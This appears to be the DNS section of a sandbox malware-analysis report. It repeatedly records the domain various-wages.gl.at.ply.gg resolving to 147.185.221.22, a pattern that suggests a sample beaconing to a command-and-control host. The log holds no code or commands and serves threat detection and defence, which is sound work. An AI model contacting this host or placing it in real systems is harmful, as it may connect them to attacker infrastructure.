                                                            Sep 25, 2024 08:31:13.651901007 CEST8.8.8.8192.168.2.220xfc67No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.661195993 CEST8.8.8.8192.168.2.220xfc67No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.670356989 CEST8.8.8.8192.168.2.220xfc67No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.676781893 CEST8.8.8.8192.168.2.220xfc67No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.832819939 CEST8.8.8.8192.168.2.220x847dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.839834929 CEST8.8.8.8192.168.2.220x847dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.847421885 CEST8.8.8.8192.168.2.220x847dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.854715109 CEST8.8.8.8192.168.2.220x847dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.862317085 CEST8.8.8.8192.168.2.220x847dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.990798950 CEST8.8.8.8192.168.2.220x8e9No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:13.998121023 CEST8.8.8.8192.168.2.220x8e9No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.005928040 CEST8.8.8.8192.168.2.220x8e9No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.013468027 CEST8.8.8.8192.168.2.220x8e9No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.020488977 CEST8.8.8.8192.168.2.220x8e9No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.176233053 CEST8.8.8.8192.168.2.220xbb80No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.183511019 CEST8.8.8.8192.168.2.220xbb80No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.190798998 CEST8.8.8.8192.168.2.220xbb80No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.197988033 CEST8.8.8.8192.168.2.220xbb80No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:14.205116034 CEST8.8.8.8192.168.2.220xbb80No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.164691925 CEST8.8.8.8192.168.2.220xa17aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.179038048 CEST8.8.8.8192.168.2.220xa17aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.192583084 CEST8.8.8.8192.168.2.220xa17aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.206100941 CEST8.8.8.8192.168.2.220xa17aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.219800949 CEST8.8.8.8192.168.2.220xa17aNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.352545977 CEST8.8.8.8192.168.2.220xb4caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.365884066 CEST8.8.8.8192.168.2.220xb4caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.379553080 CEST8.8.8.8192.168.2.220xb4caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.391786098 CEST8.8.8.8192.168.2.220xb4caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:18.404282093 CEST8.8.8.8192.168.2.220xb4caNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.638341904 CEST8.8.8.8192.168.2.220xc11dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.645456076 CEST8.8.8.8192.168.2.220xc11dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.652544975 CEST8.8.8.8192.168.2.220xc11dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.659625053 CEST8.8.8.8192.168.2.220xc11dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.666917086 CEST8.8.8.8192.168.2.220xc11dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.791052103 CEST8.8.8.8192.168.2.220xc073No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.797985077 CEST8.8.8.8192.168.2.220xc073No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.805039883 CEST8.8.8.8192.168.2.220xc073No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.811997890 CEST8.8.8.8192.168.2.220xc073No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:21.819235086 CEST8.8.8.8192.168.2.220xc073No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.861008883 CEST8.8.8.8192.168.2.220xc407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.868079901 CEST8.8.8.8192.168.2.220xc407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.874860048 CEST8.8.8.8192.168.2.220xc407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.883094072 CEST8.8.8.8192.168.2.220xc407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:24.889533997 CEST8.8.8.8192.168.2.220xc407No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.318397045 CEST8.8.8.8192.168.2.220xce24No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.330156088 CEST8.8.8.8192.168.2.220xce24No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.341949940 CEST8.8.8.8192.168.2.220xce24No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.349128008 CEST8.8.8.8192.168.2.220xce24No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:29.356571913 CEST8.8.8.8192.168.2.220xce24No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.866209984 CEST8.8.8.8192.168.2.220x24c8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.873416901 CEST8.8.8.8192.168.2.220x24c8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.880711079 CEST8.8.8.8192.168.2.220x24c8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.888442993 CEST8.8.8.8192.168.2.220x24c8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:33.896075964 CEST8.8.8.8192.168.2.220x24c8No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.015952110 CEST8.8.8.8192.168.2.220xc3e7No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.023451090 CEST8.8.8.8192.168.2.220xc3e7No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.030375957 CEST8.8.8.8192.168.2.220xc3e7No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.037874937 CEST8.8.8.8192.168.2.220xc3e7No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.045380116 CEST8.8.8.8192.168.2.220xc3e7No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.156388044 CEST8.8.8.8192.168.2.220x96a4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.163506985 CEST8.8.8.8192.168.2.220x96a4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.170733929 CEST8.8.8.8192.168.2.220x96a4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.177172899 CEST8.8.8.8192.168.2.220x96a4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.184253931 CEST8.8.8.8192.168.2.220x96a4No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.303664923 CEST8.8.8.8192.168.2.220xfa18No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.310863018 CEST8.8.8.8192.168.2.220xfa18No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.318192005 CEST8.8.8.8192.168.2.220xfa18No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.325134039 CEST8.8.8.8192.168.2.220xfa18No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:34.332220078 CEST8.8.8.8192.168.2.220xfa18No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:38.794321060 CEST8.8.8.8192.168.2.220xb898No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:38.862059116 CEST8.8.8.8192.168.2.220xb898No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:38.979388952 CEST8.8.8.8192.168.2.220xb898No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.278388023 CEST8.8.8.8192.168.2.220xb898No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.357639074 CEST8.8.8.8192.168.2.220xb898No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.517018080 CEST8.8.8.8192.168.2.220xe930No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.523772001 CEST8.8.8.8192.168.2.220xe930No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.534148932 CEST8.8.8.8192.168.2.220xe930No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.545753002 CEST8.8.8.8192.168.2.220xe930No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.556473970 CEST8.8.8.8192.168.2.220xe930No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.685565948 CEST8.8.8.8192.168.2.220xe70dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.692259073 CEST8.8.8.8192.168.2.220xe70dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.699596882 CEST8.8.8.8192.168.2.220xe70dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.714843988 CEST8.8.8.8192.168.2.220xe70dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:39.721966028 CEST8.8.8.8192.168.2.220xe70dNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.105978012 CEST8.8.8.8192.168.2.220xb7c6No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.112503052 CEST8.8.8.8192.168.2.220xb7c6No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.119085073 CEST8.8.8.8192.168.2.220xb7c6No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.126230955 CEST8.8.8.8192.168.2.220xb7c6No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:44.134004116 CEST8.8.8.8192.168.2.220xb7c6No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.206239939 CEST8.8.8.8192.168.2.220xda2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.213459969 CEST8.8.8.8192.168.2.220xda2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.220782042 CEST8.8.8.8192.168.2.220xda2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.439754963 CEST8.8.8.8192.168.2.220xda2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.447596073 CEST8.8.8.8192.168.2.220xda2No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.576834917 CEST8.8.8.8192.168.2.220x6d7eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.584281921 CEST8.8.8.8192.168.2.220x6d7eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.591917038 CEST8.8.8.8192.168.2.220x6d7eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.604644060 CEST8.8.8.8192.168.2.220x6d7eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.616424084 CEST8.8.8.8192.168.2.220x6d7eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.727279902 CEST8.8.8.8192.168.2.220xce56No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.735761881 CEST8.8.8.8192.168.2.220xce56No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.744043112 CEST8.8.8.8192.168.2.220xce56No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.753088951 CEST8.8.8.8192.168.2.220xce56No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.766299009 CEST8.8.8.8192.168.2.220xce56No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.890347958 CEST8.8.8.8192.168.2.220xbed1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.897409916 CEST8.8.8.8192.168.2.220xbed1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.904468060 CEST8.8.8.8192.168.2.220xbed1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.911137104 CEST8.8.8.8192.168.2.220xbed1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:48.918046951 CEST8.8.8.8192.168.2.220xbed1No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.687669039 CEST8.8.8.8192.168.2.220xd005No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.702198982 CEST8.8.8.8192.168.2.220xd005No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.710417032 CEST8.8.8.8192.168.2.220xd005No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.718358994 CEST8.8.8.8192.168.2.220xd005No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.727880955 CEST8.8.8.8192.168.2.220xd005No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.854849100 CEST8.8.8.8192.168.2.220xbc08No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.861890078 CEST8.8.8.8192.168.2.220xbc08No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.868648052 CEST8.8.8.8192.168.2.220xbc08No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.878483057 CEST8.8.8.8192.168.2.220xbc08No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:52.885298014 CEST8.8.8.8192.168.2.220xbc08No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.362173080 CEST8.8.8.8192.168.2.220xeb04No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.369301081 CEST8.8.8.8192.168.2.220xeb04No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.376456022 CEST8.8.8.8192.168.2.220xeb04No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.383559942 CEST8.8.8.8192.168.2.220xeb04No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.390934944 CEST8.8.8.8192.168.2.220xeb04No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.520279884 CEST8.8.8.8192.168.2.220xb464No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.527551889 CEST8.8.8.8192.168.2.220xb464No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.534796953 CEST8.8.8.8192.168.2.220xb464No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.541990995 CEST8.8.8.8192.168.2.220xb464No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.549345970 CEST8.8.8.8192.168.2.220xb464No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.666124105 CEST8.8.8.8192.168.2.220xd90eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.672784090 CEST8.8.8.8192.168.2.220xd90eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.679367065 CEST8.8.8.8192.168.2.220xd90eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.686012030 CEST8.8.8.8192.168.2.220xd90eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.693562984 CEST8.8.8.8192.168.2.220xd90eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.815228939 CEST8.8.8.8192.168.2.220xe0aeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.822472095 CEST8.8.8.8192.168.2.220xe0aeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.829236984 CEST8.8.8.8192.168.2.220xe0aeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.836644888 CEST8.8.8.8192.168.2.220xe0aeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.843312025 CEST8.8.8.8192.168.2.220xe0aeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.973449945 CEST8.8.8.8192.168.2.220x3c38No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.983525038 CEST8.8.8.8192.168.2.220x3c38No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.991147995 CEST8.8.8.8192.168.2.220x3c38No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:56.997776031 CEST8.8.8.8192.168.2.220x3c38No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.005939960 CEST8.8.8.8192.168.2.220x3c38No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.124403954 CEST8.8.8.8192.168.2.220x28edNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.132200956 CEST8.8.8.8192.168.2.220x28edNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.139445066 CEST8.8.8.8192.168.2.220x28edNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.148540020 CEST8.8.8.8192.168.2.220x28edNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.155399084 CEST8.8.8.8192.168.2.220x28edNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.777311087 CEST8.8.8.8192.168.2.220x1973No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.784668922 CEST8.8.8.8192.168.2.220x1973No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.791711092 CEST8.8.8.8192.168.2.220x1973No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.798187017 CEST8.8.8.8192.168.2.220x1973No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.805521965 CEST8.8.8.8192.168.2.220x1973No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.917115927 CEST8.8.8.8192.168.2.220x4065No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.926259995 CEST8.8.8.8192.168.2.220x4065No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.934274912 CEST8.8.8.8192.168.2.220x4065No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.942642927 CEST8.8.8.8192.168.2.220x4065No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:57.949095011 CEST8.8.8.8192.168.2.220x4065No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.086045980 CEST8.8.8.8192.168.2.220xbc4eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.093139887 CEST8.8.8.8192.168.2.220xbc4eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.100141048 CEST8.8.8.8192.168.2.220xbc4eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.107234955 CEST8.8.8.8192.168.2.220xbc4eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.113677025 CEST8.8.8.8192.168.2.220xbc4eNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.226977110 CEST8.8.8.8192.168.2.220xe2eeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.233784914 CEST8.8.8.8192.168.2.220xe2eeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.240799904 CEST8.8.8.8192.168.2.220xe2eeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.247713089 CEST8.8.8.8192.168.2.220xe2eeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:31:58.254601955 CEST8.8.8.8192.168.2.220xe2eeNo error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
                                                            Sep 25, 2024 08:32:02.550693035 CEST8.8.8.8192.168.2.220x7776No error (0)various-wages.gl.at.ply.gg147.185.221.22A (IP address)IN (0x0001)false
